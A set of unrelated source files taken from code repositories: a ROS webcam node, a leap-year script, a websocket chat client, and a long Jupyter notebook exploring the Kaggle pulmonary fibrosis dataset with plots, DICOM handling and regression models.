d482fc54652390d38a71486ad7896776534966ae | 64ad122b299e457e2b37fddf9b059bdbf5858ca8 | /src/pose_estimation/scripts/image_processor.py | b2db59ae85d4feec36eb2651722ef72e9337183a | [] | no_license | faheinrich/pose_project | 8218d140f6020bc56bad1ef7ac3a40e53a6a3053 | 23e4283358940f662e7b12d1ad98d7ebc3c2efe6 | refs/heads/main | 2023-05-12T21:06:14.628014 | 2021-06-01T20:27:19 | 2021-06-01T20:27:19 | 365,174,377 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,045 | py | #!/usr/bin/env python3
# Description:
# - Subscribes to real-time streaming video from your built-in webcam.
#
# Author:
# - Addison Sears-Collins
# - https://automaticaddison.com
# Import the necessary libraries
import rospy # Python library for ROS
from sensor_msgs.msg import Image # Image is the message type
from cv_bridge import CvBridge # Package to convert between ROS and OpenCV Images
import cv2 # OpenCV library
# import sys
# import time
# import logging
# import numpy as np
# import matplotlib.pyplot as plt
# import cv2
# from tf_pose import common
# from tf_pose.estimator import TfPoseEstimator
# from tf_pose.networks import get_graph_path, model_wh
pub = rospy.Publisher('view_this', Image, queue_size=1)
# """
# https://learnopencv.com/deep-learning-based-human-pose-estimation-using-opencv-cpp-python/
# """
# # Specify the paths for the 2 files
# protoFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_deploy_linevec.prototxt"
# weightsFile = "/home/fabian/ros/catkin_ws/resources/cv2_net/pose/mpi/pose_iter_160000.caffemodel"
# # Read the network into Memory
# net = cv2.dnn.readNetFromCaffe(protoFile, weightsFile)
# inWidth = 368
# inHeight = 368
# threshold = 0.6
def process_frame(frame):
# frame = cv2.resize(frame, (inHeight, inWidth))
# # frame = cv2.resize(frame, (inHeight, inWidth))
# # Prepare the frame to be fed to the network
# inpBlob = cv2.dnn.blobFromImage(frame, 1.0 / 255, (inWidth, inHeight), (0, 0, 0), swapRB=False, crop=False)
# # Set the prepared object as the input blob of the network
# net.setInput(inpBlob)
# output = net.forward()
# rospy.loginfo(output.shape)
# H = output.shape[2]
# W = output.shape[3]
# # Empty list to store the detected keypoints
# points = []
# # 44 for mpi
# for i in range(44):
# # confidence map of corresponding body's part.
# probMap = output[0, i, :, :]
# # Find global maxima of the probMap.
# minVal, prob, minLoc, point = cv2.minMaxLoc(probMap)
# # Scale the point to fit on the original image
# x = (inWidth * point[0]) / W
# y = (inHeight * point[1]) / H
# if prob > threshold :
# cv2.circle(frame, (int(x), int(y)), 5, (0, 255, 255), thickness=-1, lineType=cv2.FILLED)
# # cv2.putText(frame, "{}".format(i), (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1.4, (0, 0, 255), 3, lineType=cv2.LINE_AA)
# # Add the point to the list if the probability is greater than the threshold
# points.append((int(x), int(y)))
# else :
# points.append(None)
# cv2.imshow("Output-Keypoints",frame)
# cv2.waitKey()
# for pair in POSE_PAIRS:
# partA = pair[0]
# partB = pair[1]
# if points[partA] and points[partB]:
# cv2.line(frameCopy, points[partA], points[partB], (0, 255, 0), 3)
# from rgb to bgr to show change
return frame[:,:,::-1]
def callback(data):
# Used to convert between ROS and OpenCV images
br = CvBridge()
# Output debugging information to the terminal
rospy.loginfo("receiving video frame")
# Convert ROS Image message to OpenCV image
received_frame = br.imgmsg_to_cv2(data)
rospy.loginfo('processing received image')
processed_frame = process_frame(received_frame)
pub.publish(br.cv2_to_imgmsg(processed_frame))
def receive_message():
# Tells rospy the name of the node.
# Anonymous = True makes sure the node has a unique name. Random
# numbers are added to the end of the name.
rospy.init_node('image_processor', anonymous=True)
# Node is subscribing to the video_frames topic
rospy.Subscriber('webcam_frames', Image, callback)
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
# Close down the video stream when done
cv2.destroyAllWindows()
if __name__ == '__main__':
receive_message()
| [
"faheinrich98@gmail.com"
] | faheinrich98@gmail.com |
48489ccc71bb088f7c28deb51e9c47dcd3617c1c | 43226c0909e4164c4f69f1e462e6d089100131ee | /leap year yes or no.py | d610078f8b940c1822590c71a8c7421509a33a61 | [] | no_license | subashbabu97/leapyear | 8bf9e0449b65305c423350c5117d744304bee68b | 5cf9440abd8468f469dcf6fe30b43f54df84f92c | refs/heads/master | 2020-05-31T22:55:34.982996 | 2019-06-06T06:51:11 | 2019-06-06T06:51:11 | 190,529,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 95 | py | a=int(input("Input:"))
b=a%4
if b==0:
print("Output:yes")
else:
print("Output:no")
| [
"noreply@github.com"
] | noreply@github.com |
8c49afcd2557458371bc37031be00356b871799d | 092e00ae8389811929a381637b73dcb2303fefeb | /blog/domain/user.py | 338592ec2da4b0e0020f532f84602d13ba2ace07 | [] | no_license | uiandwe/rest_framework_ex | 33cfb73e386785009b1d012a3dfa6909bdc74ab3 | 8130bcf9a6ffd67b91906c85d66ed9d8d453bab8 | refs/heads/master | 2022-11-27T20:56:26.911462 | 2021-10-12T07:46:17 | 2021-10-12T07:46:17 | 234,095,110 | 0 | 0 | null | 2022-11-22T05:17:55 | 2020-01-15T14:12:34 | Python | UTF-8 | Python | false | false | 220 | py | # -*- coding: utf-8 -*-
class User:
def __init__(self, email, username):
self.email = email
self.username = username
def __repr__(self):
return "{}, {}".format(self.email, self.username)
| [
"uiandwe@gmail.com"
] | uiandwe@gmail.com |
36815ed5dbc21619f0e347fd9614d4889ea71b0d | bfb882c400956861fccd40bf1fb53cd6ddcba41e | /hagelslag/processing/__init__.py | 947f56449e95c6deffd11da0f81a50f94c71a716 | [
"MIT"
] | permissive | stsaten6/hagelslag | 3b1b07cf424997686b3320c538a188c790232bd7 | 6b7d0779a0b0ac4bd26fbe4931b406fad1ef9f9e | refs/heads/master | 2020-03-10T17:38:44.528943 | 2018-04-12T20:50:38 | 2018-04-12T20:50:38 | 129,504,847 | 2 | 0 | MIT | 2018-04-14T09:58:37 | 2018-04-14T09:58:37 | null | UTF-8 | Python | false | false | 524 | py | from .EnhancedWatershedSegmenter import EnhancedWatershed
from .EnsembleProducts import MachineLearningEnsembleProducts, EnsembleProducts, EnsembleConsensus
from .Hysteresis import Hysteresis
from .ObjectMatcher import ObjectMatcher, TrackMatcher
from .ObjectMatcher import mean_minimum_centroid_distance, centroid_distance, shifted_centroid_distance, nonoverlap, \
mean_min_time_distance, start_centroid_distance, start_time_distance, closest_distance
from .STObject import STObject, read_geojson
from .tracker import * | [
"djgagne@ou.edu"
] | djgagne@ou.edu |
fad84be7b3588e086eaa4f7158e430de704c6e85 | e35d35b22f11be27f439900e97248b7cab7aa85e | /client.py | beb1d0771d531e912584b4e968bc4f762d483a90 | [] | no_license | jkaria/chat-server | e1903912e047180077eb4b2bf9b7d2db1637fe33 | b92e0af97a1d4105d070b15951c91d7e406c39ab | refs/heads/master | 2020-03-20T23:08:22.980615 | 2018-06-22T04:14:42 | 2018-06-22T04:14:42 | 137,831,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,458 | py | import websocket
import _thread as thread
import sys
import re
import json
def on_message(ws, message):
print(f"received > {message}")
def on_error(ws, error):
print(f"error > {error}")
def on_close(ws):
print("Server connection closed")
def on_open(ws):
def run(*args):
msg_format = re.compile("(.+):\s(.+)")
while True:
msg = input("<Enter message in format 'to_user_id: msg' (enter 'quit' to exit)>:\n")
if msg == 'quit':
break
m = msg_format.match(msg)
if not m:
print("invalid message format")
continue
ws.send(json.dumps({'to_user_id': m[1], 'message': m[2]}))
print(f"< sending: {m[2]}...")
ws.close()
print("Closed connection. Thread terminating...")
#TODO: look into async input to get read of this thread
thread.start_new_thread(run, ())
def connect_to_server(srv_port, username):
websocket.enableTrace(True)
ws = websocket.WebSocketApp(f"ws://localhost:{srv_port}/client/{username}",
on_message = on_message,
on_error = on_error,
on_close = on_close)
ws.on_open = on_open
ws.run_forever()
if len(sys.argv) != 3:
print("Correct usage: server.py <server_port_number> <username>")
exit(1)
connect_to_server(int(sys.argv[1]), str(sys.argv[2]))
| [
""
] | |
a47a860993c205588ad7942665c79c7af1f7846f | ee5f91fdc5d63cb1668185de611e5d0e363a006f | /Untitled1.py | ada39f951b0541519b131fe64018622e6177ad55 | [] | no_license | vikram-sreedhar/Pulmonary-Fibrosis | 38b9f020049e3fab197556a2f6b4fa71e9b6fe9b | 267f1d041f61cf86892c94aa946b89eac2b9f60b | refs/heads/master | 2022-12-17T06:21:44.062236 | 2020-09-27T20:01:13 | 2020-09-27T20:01:13 | 299,106,153 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 24,383 | py | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
import os
# In[2]:
# Visualisation libraries
import matplotlib.pyplot as plt
# In[3]:
import seaborn as sns
sns.set()
from plotly.offline import init_notebook_mode, iplot
import plotly.graph_objs as go
import plotly.offline as py
import pycountry
py.init_notebook_mode(connected=True)
import folium
from folium import plugins
# Graphics in retina format
get_ipython().run_line_magic('config', "InlineBackend.figure_format = 'retina'")
# Increase the default plot size and set the color scheme
plt.rcParams['figure.figsize'] = 8, 5
#plt.rcParams['image.cmap'] = 'viridis'
# palette colors to be used for plots
colors = ["steelblue","dodgerblue","lightskyblue","powderblue","cyan","deepskyblue","cyan","darkturquoise","paleturquoise","turquoise"]
# Disable warnings in Anaconda
import warnings
warnings.filterwarnings('ignore')
# In[4]:
from pathlib import Path
# In[5]:
from IPython.display import YouTubeVideo
YouTubeVideo('1Kyo9Hcyiq0', width=800, height=300)
# In[6]:
get_ipython().run_line_magic('pwd', '')
# In[7]:
os.chdir('D:\Kaggle\Pulmonary Fibrosis')
# In[8]:
get_ipython().run_line_magic('pwd', '')
# In[9]:
## Reading input and directory path
train = pd.read_csv('train.csv')
dataset_dir = 'D:\\Kaggle\\Pulmonary Fibrosis\\train'
# In[10]:
train
# In[95]:
test = pd.read_csv('test.csv')
# In[96]:
test
# In[13]:
## Reading test and train data
print('Train:\n',train.head(5),'\n')
print(train.isna().sum())
print('\n---------------------------------------------------------------------------\n')
print('Test:\n',test.head(5),'\n')
print(test.isna().sum())
# In[14]:
train.info()
# In[15]:
train.describe()
# In[16]:
dataset_dir
# In[17]:
train.shape[0]
# In[18]:
test.shape[0]
# In[19]:
INPUT = Path("D:/Kaggle/Pulmonary Fibrosis/train")
# In[20]:
INPUT
# In[21]:
train.Patient.agg(['nunique','count'])
# In[22]:
test.Patient.agg(['nunique','count'])
# In[23]:
fig, ax = plt.subplots(1,2,figsize=(20,5))
sns.countplot(train.Sex, palette="Reds_r", ax=ax[0]);
ax[0].set_xlabel("")
ax[0].set_title("Gender counts");
sns.countplot(test.Sex, palette="Blues_r", ax=ax[1]);
ax[1].set_xlabel("")
ax[1].set_title("Gender counts");
# In[24]:
get_ipython().run_line_magic('matplotlib', 'inline')
# In[25]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(train['SmokingStatus'],ax=axs[0])
sns.countplot(train['SmokingStatus'][train['Sex']=="Male"],ax=axs[1])
sns.countplot(train['SmokingStatus'][train['Sex']=="Female"],ax=axs[2])
fig.savefig("output2.jpeg")
# In[26]:
# Select unique bio info for the patients
agg_train = train.groupby(by="Patient")[["Patient", "Age", "Sex", "SmokingStatus"]].first().reset_index(drop=True)
# Figure
f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize = (16, 6))
a = sns.distplot(agg_train["Age"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.countplot(agg_train["Sex"], ax=ax2)
c = sns.countplot(agg_train["SmokingStatus"], ax=ax3)
a.set_title("Patient Age Distribution", fontsize=16)
b.set_title("Sex Frequency", fontsize=16)
c.set_title("Smoking Status", fontsize=16);
# In[27]:
fig, axs = plt.subplots(ncols=3)
fig.set_size_inches(19,6)
sns.countplot(test['SmokingStatus'],ax=axs[0])
fig.savefig("output3.jpeg")
# In[28]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(train.Age,kde=False,bins=80,color="k")
fig.savefig("output4.jpeg")
# In[29]:
fig, ax = plt.subplots()
fig.set_size_inches(11.7, 8.27)
sns.distplot(test.Age,kde=False,bins=80,color="k")
fig.savefig("output5.jpeg")
# In[30]:
print("Min FVC value: {:,}".format(train["FVC"].min()), "\n" +
"Max FVC value: {:,}".format(train["FVC"].max()), "\n" +
"\n" +
"Min Percent value: {:.4}%".format(train["Percent"].min()), "\n" +
"Max Percent value: {:.4}%".format(train["Percent"].max()))
# Figure
f, (ax1, ax2) = plt.subplots(1, 2, figsize = (16, 6))
a = sns.distplot(train["FVC"], ax=ax1, hist=False, kde_kws=dict(lw=6, ls="--"))
b = sns.distplot(train["Percent"], ax=ax2, hist=False, kde_kws=dict(lw=6, ls="-."))
a.set_title("FVC Distribution", fontsize=16)
b.set_title("Percent Distribution", fontsize=16);
# In[31]:
print("Minimum no. weeks before CT: {}".format(train['Weeks'].min()), "\n" +
"Maximum no. weeks after CT: {}".format(train['Weeks'].max()))
plt.figure(figsize = (16, 6))
a = sns.distplot(train['Weeks'], hist=False, kde_kws=dict(lw=8, ls="--"))
plt.title("Number of weeks before/after the CT scan", fontsize = 16)
plt.xlabel("Weeks", fontsize=14);
# In[32]:
def create_baseline():
first_scan=pd.DataFrame()
for i in train.Patient.unique():
first_scan=first_scan.append((train[train['Patient']=="{}".format(i)][:1]))
first_scan=first_scan.drop("Patient",axis=1)
first_scan=first_scan.drop("Weeks",axis=1)
return first_scan
fc=create_baseline()
fc=fc.reset_index(drop=True)
fc.head()
# In[33]:
fc
# In[34]:
(sns.pairplot(train,hue="SmokingStatus",height=4)).savefig("output5.jpeg")
# In[35]:
sns.pairplot(fc,hue="SmokingStatus",height=4).savefig("output6.jpeg")
# In[36]:
fig, ax = plt.subplots(nrows=2)
fig.set_size_inches(22, 8.27)
sns.lineplot(x='Weeks',y='Percent',data=train,ax=ax[0]).set_title("All Patients Percent trend",fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=train,ax=ax[1]).set_title("All Patients FVC trend",fontsize=15,y=0.85)
fig.savefig("weeksfvccomp.jpeg")
# In[37]:
# FVC and Percent trend Males vs Females
males=train[train["Sex"]=="Male"]
females=train[train["Sex"]=="Female"]
# In[38]:
fig, ax = plt.subplots(nrows=4)
fig.set_size_inches(22, 22)
sns.lineplot(x='Weeks',y='FVC',data=males,ax=ax[0]).set_title("MALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='FVC',data=females,ax=ax[1]).set_title("FEMALES FVC TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=males,ax=ax[2]).set_title("MALES PERCENT TREND", fontsize=15,y=0.85)
sns.lineplot(x='Weeks',y='Percent',data=females,ax=ax[3]).set_title("FEMALES PERCENT TREND", fontsize=15,y=0.85)
fig.savefig("malevsfemalesfvc_percenttrend.jpeg")
# In[39]:
# FVC and Percent trend Smokers vs nonsmokers for all patients
smoker=train[train["SmokingStatus"]=="Ex-smoker"]
never_smoked=train[train["SmokingStatus"]=="Never smoked"]
current_smoker=train[train["SmokingStatus"]=="Currently smokes"]
# In[40]:
fig, ax = plt.subplots(nrows=6)
fig.set_size_inches(22, 35)
sns.lineplot(x='Weeks',y='FVC',data=smoker,ax=ax[0]).set_title("EX SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=never_smoked,ax=ax[1]).set_title("NON SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='FVC',data=current_smoker,ax=ax[2]).set_title("SMOKER FVC TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=smoker,ax=ax[3]).set_title("EX SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=never_smoked,ax=ax[4]).set_title("NON SMOKER PERCENT TREND",fontsize=15,y=0.90)
sns.lineplot(x='Weeks',y='Percent',data=current_smoker,ax=ax[5]).set_title("SMOKER PERCENT TREND",fontsize=15,y=0.90)
fig.savefig("weeksvpercent_smokervsnonsmoker.jpeg")
# In[41]:
# creating Age-Bins in train data
category = pd.cut(train.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
train.insert(5,'Age_Bins',category)
# In[42]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["SmokingStatus"], y = train["FVC"], ax=ax1)
b = sns.barplot(x = train["SmokingStatus"], y = train["Percent"], ax=ax2)
a.set_title("Mean FVC per Smoking Status", fontsize=16)
b.set_title("Mean Perc per Smoking Status", fontsize=16);
# In[43]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["Sex"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["Sex"], ax=ax2)
a.set_title("Mean FVC per Gender per Age category", fontsize=16)
b.set_title("Mean Perc per Gender per Age Category", fontsize=16);
# In[44]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = train["Age_Bins"], y = train["FVC"], hue = train["SmokingStatus"], ax=ax1)
b = sns.barplot(x = train["Age_Bins"], y = train["Percent"], hue = train["SmokingStatus"], ax=ax2)
a.set_title("Mean FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Mean Perc per Smoking_status per Age Category", fontsize=16);
# In[45]:
plt.figure(figsize=(16,10))
sns.heatmap(train.corr(),annot=True)
# In[46]:
import scipy
# In[47]:
# Compute Correlation
corr1, _ = scipy.stats.pearsonr(train["FVC"], train["Percent"])
corr2, _ = scipy.stats.pearsonr(train["FVC"], train["Age"])
corr3, _ = scipy.stats.pearsonr(train["Percent"], train["Age"])
print("Pearson Corr FVC x Percent: {:.4}".format(corr1), "\n" +
"Pearson Corr FVC x Age: {:.0}".format(corr2), "\n" +
"Pearson Corr Percent x Age: {:.2}".format(corr3))
# In[48]:
train.describe()
# In[49]:
train.info()
# In[50]:
# creating Age-Bins in fc data
category = pd.cut(fc.Age,bins = [49,55,65,75,85,120],labels=['<=55','56-65','66-75','76-85','85+'])
fc.insert(5,'Age_Bins',category)
# In[51]:
fc.info()
# In[52]:
fc.describe()
# In[53]:
f, (ax1, ax2) = plt.subplots(1,2, figsize = (16, 6))
a = sns.barplot(x = fc["Age_Bins"], y = fc["FVC"], hue = fc["SmokingStatus"], ax=ax1)
b = sns.barplot(x = fc["Age_Bins"], y = fc["Percent"], hue = fc["SmokingStatus"], ax=ax2)
a.set_title("Patient FVC per Smoking_status per Age category", fontsize=16)
b.set_title("Patinet Perc per Smoking_status per Age Category", fontsize=16);
# In[54]:
import pydicom
# In[55]:
import os
import json
from pathlib import Path
from glob import glob
# In[56]:
from fastai.basics import *
from fastai.vision.all import *
from fastai.data.transforms import *
from fastai.medical.imaging import *
import pydicom,kornia,skimage
# In[57]:
try:
import cv2
cv2.setNumThreads(0)
except: pass
import seaborn as sns
sns.set(style="whitegrid")
sns.set_context("paper")
# In[58]:
#Visulising Dicom Files
files = Path('D:/Kaggle/Pulmonary Fibrosis/train')
# In[59]:
train_files = get_dicom_files(files)
# In[60]:
train_files
# In[61]:
info_view = train_files[33025]
dimg = dcmread(info_view)
dimg
# In[62]:
#There are some 'key' aspects within the header:
#(0018, 0015) Body Part Examined CS: Chest: images are from the chest area
#(0020, 0013) Instance Number IS: "99": this is the same as the .dcm image file
#(0020, 0032) Image Position (Patient) DS: [-191, -29, -241.200012]: represents the x, y and z positions
#(0020, 0037) Image Orientation (Patient) DS: [1, 0, 0, 0, 1, 0]: This is 6 values that represent two
#normalized 3D vectors(in this case directions) where the first vector [1,0,0] represents Xx, Xy, Xz and the
#second vector [0,1,0] that represents Yx, Yy, Yz.
#(0028, 0004) Photometric Interpretation CS: MONOCHROME2: aka the colorspace, images are being stored
#as low values=dark, high values=bright. If the colorspace was MONOCHROME then the low values=bright and high values=dark.
#(0028, 0100) Bits Allocated US: 16: each image is 16 bits
#(0028, 1050) Window Center DS: "-500.0" : aka Brightness
#(0028, 1051) Window Width DS: "-1500.0" : aka Contrast
#(0028, 1052) Rescale Intercept DS: "-1024.0" and (0028, 1053) Rescale Slope DS: "1.0":
#The Rescale Intercept and Rescale Slope are applied to transform the pixel values of the image into values that
#are meaningful to the application. It's importance is explained further in the kernel.
#(7fe0, 0010) Pixel Data OW: Array of 524288 elements: the image pixel data that pydicom uses to convert the pixel data
#into an image.
#This can be calculated by this formula:
#Array of elements = Rows X Columns X Number of frames X Samples per pixel X (bits_allocated/8)
#so in this example it would be 512 X 512 X 1 X 1 X (16/8) = 524288
# In[63]:
dimg.PixelData[:33025]
# In[218]:
dimg.pixel_array
# In[64]:
dimg.pixel_array.shape
# In[65]:
dimg.show()
# In[66]:
import pydicom as dicom
import PIL # optional
import pandas as pd
import matplotlib.pyplot as plt
# In[67]:
# Metdata of dicomfiles extracted as dataframe
df_dicom = pd.DataFrame.from_dicoms(train_files)
# In[68]:
df_dicom
# In[69]:
df_dicom.describe()
# In[70]:
df_dicom.info()
# In[71]:
df_dicom.head()
# In[72]:
get_ipython().run_line_magic('pwd', '')
# In[73]:
df_dicom.to_csv('df_dicom.csv')
# In[74]:
unique_patient_df = train.drop(['Weeks', 'FVC', 'Percent'], axis=1).drop_duplicates().reset_index(drop=True)
unique_patient_df['# visits'] = [train['Patient'].value_counts().loc[pid] for pid in unique_patient_df['Patient']]
print('Number of data points: ' + str(len(unique_patient_df)))
print('----------------------')
for col in unique_patient_df.columns:
print('{} : {} unique values, {} missing.'.format(col,
str(len(unique_patient_df[col].unique())),
str(unique_patient_df[col].isna().sum())))
unique_patient_df.head()
# In[75]:
#Convert to JPG and extracting all information in one go..
import pydicom as dicom
import matplotlib.pyplot as plt
import os
import cv2
import PIL # optional
import pandas as pd
import csv
# make it True if you want in PNG format
PNG = False
# Specify the .dcm folder path
folder_path = 'D:/Kaggle/Pulmonary Fibrosis/train/ID00007637202177411956430/'
# Specify the .jpg/.png folder path
jpg_folder_path = 'D:\Kaggle\Pulmonary Fibrosis\Train_wkg'
images_path = os.listdir(folder_path)
# In[76]:
arr=dimg.pixel_array
# In[77]:
arr
# In[78]:
df_arr = pd.DataFrame(arr)
# In[79]:
df_arr
# In[80]:
from glob import glob
# In[81]:
PATH_dicom = os.path.abspath(os.path.join('D:/Kaggle/Pulmonary Fibrosis', 'Train_jpg'))
# In[82]:
images_dicom = glob(os.path.join(PATH_dicom, "*.jpg"))
# In[83]:
images_dicom[0:5]
# In[84]:
images_dicom[0:5]
# In[85]:
r = random.sample(images_dicom, 3)
r
# In[86]:
plt.figure(figsize=(16,16))
plt.subplot(131)
plt.imshow(cv2.imread(r[0]))
plt.subplot(132)
plt.imshow(cv2.imread(r[1]))
plt.subplot(133)
plt.imshow(cv2.imread(r[2]));
# In[87]:
get_ipython().run_line_magic('pwd', '')
# In[88]:
submission = pd.read_csv('sample_submission.csv')
# In[89]:
train.drop_duplicates(keep=False, inplace=True, subset=['Patient','Weeks'])
# In[90]:
train
# In[91]:
submission
# In[92]:
submission['Patient'] = (
submission['Patient_Week']
.apply(
lambda x:x.split('_')[0]
)
)
submission['Weeks'] = (
submission['Patient_Week']
.apply(
lambda x: int(x.split('_')[-1])
)
)
submission = submission[['Patient','Weeks','FVC', 'Confidence','Patient_Week']]
submission = submission.merge(test.drop('Weeks', axis=1), on="Patient")
# In[93]:
submission
# In[97]:
test
# In[98]:
train['Dataset'] = 'train'
test['Dataset'] = 'test'
submission['Dataset'] = 'submission'
# In[99]:
submission
# In[100]:
all_data = train.append([test, submission])
all_data = all_data.reset_index()
all_data = all_data.drop(columns=['index'])
# In[101]:
all_data.head()
# In[102]:
all_data['FirstWeek'] = all_data['Weeks']
all_data.loc[all_data.Dataset=='submission','FirstWeek'] = np.nan
all_data['FirstWeek'] = all_data.groupby('Patient')['FirstWeek'].transform('min')
# In[103]:
first_fvc = (
all_data
.loc[all_data.Weeks == all_data.FirstWeek][['Patient','FVC']]
.rename({'FVC': 'FirstFVC'}, axis=1)
.groupby('Patient')
.first()
.reset_index()
)
all_data = all_data.merge(first_fvc, on='Patient', how='left')
# In[104]:
all_data.head()
# In[105]:
all_data
# In[106]:
all_data['WeeksPassed'] = all_data['Weeks'] - all_data['FirstWeek']
# In[107]:
all_data
# In[108]:
#Calculating derived field of height from First FVC value
# Reference - https://en.wikipedia.org/wiki/Vital_capacity#:~:text=It%20is%20equal%20to%20the,a%20wet%20or%20regular%20spirometer
def calculate_height(row):
if row['Sex'] == 'Male':
return row['FirstFVC'] / (27.63 - 0.112 * row['Age'])
else:
return row['FirstFVC'] / (21.78 - 0.101 * row['Age'])
all_data['Height'] = all_data.apply(calculate_height, axis=1)
# In[109]:
all_data.head()
# In[110]:
all_data = pd.concat([
all_data,
pd.get_dummies(all_data.Sex),
pd.get_dummies(all_data.SmokingStatus)
], axis=1)
all_data = all_data.drop(columns=['Sex', 'SmokingStatus'])
# In[111]:
all_data.head()
# In[112]:
def scale_feature(series):
return (series - series.min()) / (series.max() - series.min())
all_data['Percent'] = scale_feature(all_data['Percent'])
all_data['Age'] = scale_feature(all_data['Age'])
all_data['FirstWeek'] = scale_feature(all_data['FirstWeek'])
all_data['FirstFVC'] = scale_feature(all_data['FirstFVC'])
all_data['WeeksPassed'] = scale_feature(all_data['WeeksPassed'])
all_data['Height'] = scale_feature(all_data['Height'])
# In[113]:
feature_columns = [
'Percent',
'Age',
'FirstWeek',
'FirstFVC',
'WeeksPassed',
'Height',
'Female',
'Male',
'Currently smokes',
'Ex-smoker',
'Never smoked',
]
# In[114]:
train_new = all_data.loc[all_data.Dataset == 'train']
test_new = all_data.loc[all_data.Dataset == 'test']
submission_new = all_data.loc[all_data.Dataset == 'submission']
# In[115]:
train_new[feature_columns].head()
# In[116]:
train_new
# In[117]:
import sklearn
from sklearn import linear_model
# In[118]:
model = linear_model.LinearRegression()
# In[119]:
model.fit(train_new[feature_columns], train_new['FVC'])
# In[120]:
plt.bar(train_new[feature_columns].columns.values, model.coef_)
plt.xticks(rotation=90)
plt.show()
# In[121]:
from sklearn import linear_model, ensemble
from sklearn.metrics import mean_squared_error, mean_absolute_error
# In[122]:
predictions = model.predict(train_new[feature_columns])
mse = mean_squared_error(
train['FVC'],
predictions,
squared=False
)
mae = mean_absolute_error(
train['FVC'],
predictions
)
print('MSE Loss: {0:.2f}'.format(mse))
print('MAE Loss: {0:.2f}'.format(mae))
# In[123]:
print (model.coef_)
# In[124]:
print (model.intercept_)
# In[125]:
# Rsquare value for the model
model.score(train_new[feature_columns], train_new['FVC'])
# In[126]:
X = train_new[feature_columns]
# In[127]:
Y = train_new['FVC']
# In[128]:
X
# In[129]:
import statsmodels.formula.api as smf
# In[130]:
model_smf_1 = smf.ols(formula='Y~X',data = train_new).fit()
# In[131]:
train_new['prediction'] = predictions
# In[132]:
predictions
# In[133]:
model_smf_1.params
# In[134]:
prediction_smf = model_smf_1.predict(train_new[feature_columns])
# In[135]:
model_smf_1.summary()
# In[136]:
prediction_smf
# In[137]:
predictions
# In[138]:
prds_1_sklearn = pd.DataFrame(predictions)
# In[139]:
prds_1_sklearn
# In[140]:
prds_2_statstools = pd.DataFrame(prediction_smf)
# In[141]:
prds_2_statstools
# In[142]:
plt.scatter(predictions, train_new['FVC'])
plt.xlabel('predictions')
plt.ylabel('FVC (labels)')
plt.show()
# In[143]:
delta = predictions - train_new['FVC']
plt.hist(delta, bins=20)
plt.show()
# In[144]:
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# In[145]:
train_patients = train_new.Patient.unique()
# In[146]:
fig, ax = plt.subplots(10, 1, figsize=(10, 20))
for i in range(10):
patient_log = train_new[train_new['Patient'] == train_patients[i]]
ax[i].set_title(train_patients[i])
ax[i].plot(patient_log['WeeksPassed'], patient_log['FVC'], label='truth')
ax[i].plot(patient_log['WeeksPassed'], patient_log['prediction'], label='prediction')
ax[i].legend()
# In[149]:
submission_new
train_new
# In[152]:
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestRegressor
from sklearn import metrics
get_ipython().run_line_magic('matplotlib', 'inline')
# In[153]:
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.3, random_state=0)
# In[154]:
#Create a Gaussian Classifier
regr=RandomForestRegressor(random_state=0)
#Train the model using the training sets Y_pred=clf.predict(X_test)
regr.fit(X_train,Y_train)
# In[155]:
regr.n_estimators
# In[156]:
regr.estimators_[5]
# In[157]:
regr.get_params()
# In[158]:
regr.feature_importances_
# In[162]:
Y_pred = regr.predict(X_test)
# In[163]:
df = pd.DataFrame({'Actual': Y_test, 'Predicted': Y_pred})
df
# In[164]:
df1 = df.head(50)
df1.plot(kind='bar',figsize=(16,10))
plt.grid(which='major', linestyle='-', linewidth='0.5', color='green')
plt.grid(which='minor', linestyle=':', linewidth='0.5', color='black')
plt.show()
# In[165]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[166]:
from sklearn.tree import export_graphviz
import pydot
# In[167]:
tree = regr.estimators_[5]
# In[168]:
export_graphviz(tree,out_file = 'tree.dot',
feature_names = X.columns,
filled = True,
rounded = True,precision = 1)
# In[169]:
(graph, ) = pydot.graph_from_dot_file('tree.dot')
# In[170]:
graph
# In[171]:
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz2.38/bin/'
# In[172]:
graph.write_png('tree_graph.png')
# In[173]:
errors_test = abs(Y_pred - Y_test)
# In[174]:
# Display the performance metrics
print('Mean Absolute Error:', round(np.mean(errors_test), 2), 'degrees.')
mape = np.mean(100 * (errors_test / Y_test))
accuracy = 100 - mape
